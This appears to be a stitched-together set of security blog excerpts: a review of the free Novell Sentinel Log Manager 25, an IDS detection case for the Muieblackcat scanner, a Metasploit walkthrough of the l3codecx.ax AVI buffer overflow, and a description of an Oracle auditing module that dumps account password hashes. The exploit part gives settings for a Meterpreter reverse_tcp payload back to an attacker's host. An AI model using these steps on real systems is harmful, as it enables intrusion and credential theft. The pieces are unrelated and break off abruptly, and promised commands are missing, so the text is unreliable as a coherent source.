Novell provide a free version of they Log Management solution named Novell Sentinel Log Manager 25.This version is not a trial version. A good occasion to discover this Log Management solution and to better know the provided features and limits of this product. You only need to register on the Novell Website in order to be allowed to download the free version.
From the Novell Download Center, you will be able to download :
- The latest version of Novell Sentinel Log Manager as ISO, VMWare or Xen image.
- All Sentinel Collectors how permit you to parse the data from a variety of event sources into the normalized Sentinel event structure.
- All Sentinel Connectors how permit you to facilitate the connectivity between Sentinel Collectors and event or data sources.
- Solution Packs, such as “Identity Tracking“, “PCI-DSS“, “SAP” or “Sentinel Core“.
- Actions Plug-ins how are remediation actions that can be triggered by correlation rules, such as “Generic Event Forwarder“, “Create Remedy Ticket“, etc.
- Integrators how provide integration with external third-party products that can be easily called from Action Plug-ins, such as “Remedy“, “SMTP“, “SOAP“, etc.
- Utilities how provide additional functionality for Sentinel and/or are commonly used by several other Plug-ins.
- The documentations are available online or in PDF format.
Supported Platforms & Browsers
Supported Operating Systems for Novell Sentinel Log Manager installation are :
- 64-bit SUSE Linux Enterprise Server 11 SP1 for Sentinel Log Manager versions 1.2 and later.
- SUSE Linux Enterprise Server 10 SP2 (32-bit and 64-bit)
- SUSE Linux Enterprise Server 11 (32-bit and 64-bit)
- SUSE Linux Enterprise Server 11 SP1 (32-bit and 64-bit) for Collector Managers 1.2 and later.
- Windows Server 2003 (32-bit and 64-bit)
- Windows Server 2003 SP2 (32-bit and 64-bit)
- Windows Server 2003 R2 (32-bit and 64-bit)
- Windows Server 2008 (64-bit)
- Windows Server 2008 R2 (64-bit)
- VMWare ESX/ESXi 3.5/4.0 or higher
- VMPlayer 3 (for demo only)
- Xen 3.1.1
- Mozilla Firefox 3.6 for Linux
- Mozilla Firefox 3 for Windows
- Microsoft Internet Explorer 8
- 4 GB RAM, cause SLES is a 64-bit version
- 48 GB hard disk
- 1 VCPU
Sentinel Collector Managers
The Collector Managers manage all data collection and data parsing for Novell Sentinel Log Manager. One Collector Manager is installed by default during the Sentinel Log Manager installation. However, you can install multiple Collector Managers in a distributed setup, but take care on the 25 EPS limits. A Collector Manager is communicating with the Novell Sentinel Log Manager on port 61616/TCP. All installed Collectors and Connectors will communicate with the Collector Manager and forward the collected data to Novell Sentinel Log Manager for storage and processing.
Connectors facilitate the connectivity between Sentinel Collectors and event or data sources. All Collectors should communicate with a determined Connector. Example of Connectors : Novell Audit, Database, File, LEA, IBM Mainframe, Process, Syslog, SNMP, Windows WMI, etc. You can find a complete list of all supported Connectors by registering on Novell Website.
Collectors are scripts that parse the data from a variety of event sources into the normalized Sentinel event structure, or in some cases collect other forms of data from external data sources. Each Collector should be deployed with a compatible Connector. Novell support around 100 collectors such as Check Point, Cisco, Apache, Microsoft, McAffee, Juniper, etc. All of them are free to use with the 25 EPS version of Novell Sentinel Log Manager. You can find a complete list of all supported Collectors by registering on Novell Website.
Novell Sentinel Log Manager 25 Features, Limitations and Restrictions
- Compression rate of 10:1
- Unlimited number of Collectors. Allows you to use any Collector without any restriction
- Unlimited EPS Limited Event Store. Provides the ability to persist with the event flow even if the event view is restricted because of the expired or not licensed Event Store feature.
- Unlimited Embedded Database. Stores the Sentinel Log Manager configuration data.
- Unlimited usage of the reporting module.
- Authorized network storage (NFS, CIFS, locally mounted SAN).
- EPS rate limited to a maximum of 25 after 60 days, unlimited before. So you will have a maximum of 2 160 000 events per day (25 * 86 400).
- With the VMWare or Xen appliance, 48 GB hard disk, how represent 480 GB with a 10:1 compression rate. The storage and the compression rate will permit you to store around 1 717 986 918 events ((480 x 1024 x 1024 x 1024) / 300). If you are fully using the 25 EPS rate, you will have a maximum retention of 795,36 days.
- Rules limited to 60 days. You can configure rules to filter events based on one or more of the searchable fields. Each rule can be associated with one or more of the configured actions. After the free license expiration the Rules are no more executed.
- Actions limited to 60 days. You can configure actions to deliver an event to one or more actions when it meets the criteria specified by one of the rules (ex: Email, Log to file, Log to Syslog, Send to Sentinel Link). After the free license expiration the Actions are no more executed.
- Distributed Searches limited to 60 days. Enables you to search events and report event data not only on your local Sentinel Log Manager server, but also on other Sentinel Log Manager servers distributed across the globe. After the free license expiration you can still add, modify, and delete the search target configurations. However, only the local event store is used for searches and reports while you are using an expired license. This applies to all distributed searches and reports, even if they were scheduled before the license expired.
- Event Store limited to 60 days. Enables you to view the details of all the events regardless of the EPS rate. The authorized event rate after the license expires is 25 EPS. Any events received while the system averages more than 25 EPS are stored, but the details of those events are not displayed in the search results or reports. These events are tagged with the OverEPSLimit tag.
- Sentinel Link limited to 60 days. Provides the ability to hierarchically link multiple Sentinel systems, including Sentinel Log Manager and the two Sentinel Security Information Event Management (SIEM) systems, Novell Sentinel and Novell Sentinel Rapid Deployment systems. After the free license expiration the events cannot be sent or received by using Sentinel Link.
- Use Case Reference : SUC027
- Use Case Title : Muieblackcat setup.php Web Scanner/Robot
- Use Case Detection : IDS / HTTP logs
- Attacker Class : Opportunists
- Attack Sophistication : Unsophisticated
- Identified tool(s) : N.D.
- Source IP(s) : Random
- Source Countries : Random
- Source Port(s) : Random
- Destination Port(s) : 80/TCP, 443/TCP
Possible(s) correlation(s) :
- Regarding the logs, this scanner is looking for “setup.php” files.
Emerging Threats SIG 2013115 triggers are :
- The HTTP header should contain “GET /muieblackcat HTTP/1.1“. A complete set of logs is available here.
- The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.
Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability the 2010-04-13
Metasploit PoC provided the 2011-08-12
PoC provided by :
Affected version(s) :
Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 6
This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0′s so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
sessions -i 1
Metasploit provide one useful and additional Oracle database auxiliary module who will permit you to gather informations.
You can find all these auxiliary modules through the Metasploit search command.
To invoke this auxiliary module just type the following command :
This module will scan the Oracle database server to gather different informations :
- Oracle version (select * from v$version)
- All values from v$parameter (select name,value from v$parameter)
- If database audit trail is enabled or not
- If database sys operations audit is enabled or not
- If SQL92 security restriction on SELECT is enabled or not
- If link encryption for logins is enabled or not
- Provide you the UTL directory access configuration
- Provide you the audit log directory configuration
- Provide you the current account lockout time from the password policy
- Provide you the number of authorized failed logins value before an account is locked from the password policy
- Provide you the password grace time value from the password policy
- Provide you the password lifetime value from the password policy
- Provide you the the number of times a password can be reused from the password policy
- Provide you the maximun number of times a password needs to be changed before it can be reused from the password policy
- Check if the password complexity is enabled or not
- Provide you a list of all active accounts in format Username, Hash and Spare4
- Provide you a list of all expired or locked accounts in format Username, Hash and Spare4
- Provide you a list of all accounts with DBA privileges in format Username and Hash
- Provide you a list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
- Check default password are setup on the database.